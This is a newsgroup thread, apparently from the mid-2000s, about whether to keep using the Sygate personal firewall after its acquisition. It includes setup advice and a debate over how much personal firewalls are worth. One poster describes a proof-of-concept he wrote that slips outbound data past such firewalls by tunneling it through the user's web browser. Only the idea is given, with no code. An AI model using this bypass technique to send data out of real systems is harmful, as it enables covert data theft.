Having just read that Sygate was purchased by Symantic, and I just started using Sygate about a month ago, I'm wondering if I should be looking for something else or continue to use Sygate.
Overall, I like Sygate but I'm still in the learning stages.
I realize no one can see the future, but are the upgraded versions really that important. I mean Sygate is working now, but in six months or a year would technology outpace it?? [Assuming no further upgrades are issued]
Many moon ago, I used Zonealarm but it seemed to get flaky after awhile. Version 3 I think. Was using Norton until it expired. Came with new Dell System.
Currently using: XP Home Sygate AVGuard Firefox Agent Both AOL & MSN messenger.
No other apps have access to net. If anything comes up and asks to enter or leave computer I say no. So far nothing has barfed.
I've been reading this group and a virus group. Learned a lot, but I'm no expert in computers. Just looking for any info about situation.
I'm sticking with Sygate the free version for the next few months. Can't predict what I'll do after that.
Since you just started using it, remember to go to 'applications' and on each permitted app click on 'advanced' and set 'act as server' to No unless you specifically need it to serve. It's the one weakness of Sygate, a mistaken default setting. No big. Nex
Hi Tom. Guess I am one of the diehards who will keep using Sygate for as long as possible. It has served me well for 4-yrs and without causing any problems. When I heard the bad news last week, I began having the same concerns as you. I see it this way:
1) Our installed Sygate contains all of the basic firewall requirements. i.e. control of applications, IPs, ports, and protocols. About the only thing overlooked is local host control 127.0.0.1. Sygate was going to fix that but I guess they won't get to it :-(.
2) One big concern is the probable loss of signature updates. You didn't say if you have the free or pro version. Only the pro has Intruder Detection System (IDS) and the intrusion signature updates. Compare them at:
prowled around looking at the files in my Sygate pro and found trojan.dat. Looks like that is where the downloaded signatures go. I contains a listing of hundreds of trojan applications. If you continue to use Sygate pro you might want to make a backup of file trojan.dat. You could supplement the use of the retained data with a good hosts file:
I've d/led Kerio and still looking through manual. I still have to see about a ZA manual. These seem to be the most popular PFW's. The problem I have [And other neophyte users no doubt] is translating the manual to english.
Yes, of course. This is a proof of concept (POC) code sample to show, how easy it is to trick "Personal Firewalls". It's written in the programming language "C", so this is the reason, why it's a .c file.
You can compile it to an executable and try it out with Microsoft's MSVC or i.e. with MingGW.
It sends this information outside: "breakout.html". This is done by using your webbrowser to send this information, because usually "Personal Firewall" users allow their webbrowser to communicate - or they cannot use the WWW any more.
Of course, you can send other things than "breakout.html", anything else also works, and you can send elsewhere than to
because it's just my machine ;-)
I wrote this piece of code, because we had such discussions also in de.comp.security.misc and de.comp.security.firewall, the German sister groups.
Some people claimed, that "Personal Firewalls" are secure, and that we just had no idea, how a real "Personal Firewall" works.
So I was hacking those few lines of code without ever seen a "Personal Firewall" before. Ansgar Wiechers made a test with the most common "Personal Firewalls" (Kerio, Norman, Outpost, Sygate, Tiny, ZoneAlarm, Symantec Norton), and they all failed already with such an easy trick.
You should notice: this is only the easiest trick I'm aware of. There are many, many other possibilities, too, to tunnel.
So we have the proof, that a "Personal Firewall" only can control these applications, which allow to be controlled This means, they're useless, because a packet filter you're getting with the Windows-Firwall also for free.
If you're using Microsoft Windows, then you have to trust Microsoft.
Microsoft Windows is the operating system. The operating system contains the program - the kernel - which has the job to control all other programs on your system. If you're not trusting in this program (the Windows kernel), then you cannot trust the complete system. It does not matter, if you add some extra software or not for this point.
BTW: the Windows kernel is not too bad. Until a limit I'd trust it. And Microsoft is not the "evil empire" or something, Bill does not run around with a black mantle, and I guess, he hasn't such heavy problems with his breathing ;-) There are much better arguments for free software than "no Microsoft".
OK so far? Well, next...
Tunneling cannot prohibited without loosing connection. Why this is true, I explained some postings ago. Please read them, thank you ;-)
All what to do to ignore the control of a "Personal Firewall" for "outbound connections" is to use some tunneling. This was clear, before I saw my very first "Personal Firewall" (I in fact never used one, but in the meanwhile, I saw Ansgar Wiechers testing some, and what I saw, was a terribly incompetent accumulation of software garbage, I was scared - I did not realize before, how sad those products are).
So I reflected, what would just be the easiest way for me to implement tunneling, with what I'd have fewest work ;-) I decided to use tunneling through Windows messages and HTTP with the web-browser the user uses. This had an extra advantage - the browser usually is an exception, and is not castrated by the "Personal Firewall" on every box, I thought, because otherwise there would be no way for the user left to use webpages. So perhaps using the browser was easiest.
I wrote a proof of concept, a POC code - this is what you find on
- and I wrote it for Internet Explorer, because most of the people who came to de.comp.security.* (where I'm reading/writing) and are using "Personal Firewalls", also are using this browser.
Other people tryed it out with their "Personal Firewalls", and it ignored any "Personal Firewall", as expected.
Then the first thing I heard was "but this is only with Internet Explorer, because this browser is so insecure". So I wrote a POC for a second browser, too, Mozilla Firefox, to show that this is not a browser problem. You can find this code on
Meanwhile, Ansgar Wiechers has tested this and many other attacks against many "Personal Firewalls", and none of them managed to prohibit communi- cation to the outside.
This is not surprising, if you know, that you cannot prohibit tunneling at all, it's just technically impossible, it's even theoretically impossible.
The result of this thinking is: you only can control software, which is already running on your PC, which is of good nature and wants to be controlled, or which is malware and very dumb and incompetent itself.
Agreed, though it should be noted Windows has much more than the kernel. This is, in fact, the same argument that has to be made against binary-only drivers in the Linux kernel.
For the most part, I agree here. However, I personally feel that I cannot trust Microsoft, having personally used five consecutive versions of Windows, all of which did not perform as advertised in one form or another. In addition, Microsoft's security track record is just plain atrocious. Granted, for a while Red Hat wasn't doing a whole lot better, and other GNU/Linux distributions have had rather large gaffes as well. But the cold hard fact is, before Windows was Internet capable, there was *the* Internet worm, as in one. Remember that.
Another problem, not necessarily Microsoft's fault but a large part of it, has to do with the rest of the shrinkwrapped binary-only software industry which they have more or less legitimized. Usually this means getting new software means opening up your wallet and releasing anywhere from $20 to $1,000 or more, or playing Russian roulette with unauthorized copies. I have the desire to do neither, and at the same time bring other players to the game which I may not trust any more than Microsoft.
And that which you can't control, you can always kill, right?
I know. I don't think, Microsoft Windows is a highly secure platform or something. They're getting better with this SP2 stuff for Windows XP now, but there is much work left to do. And Windows just is to complex to become a higly secure system ever, I think.
But: if one doesn't trust into Microsoft, then she/he just shouldn't use Windows. That was what I was trying to say.
Unfortunately, this is not true for every malware. You just can protect your PC and keep your eyes open and your brain clear, so you will not get malware running on your box.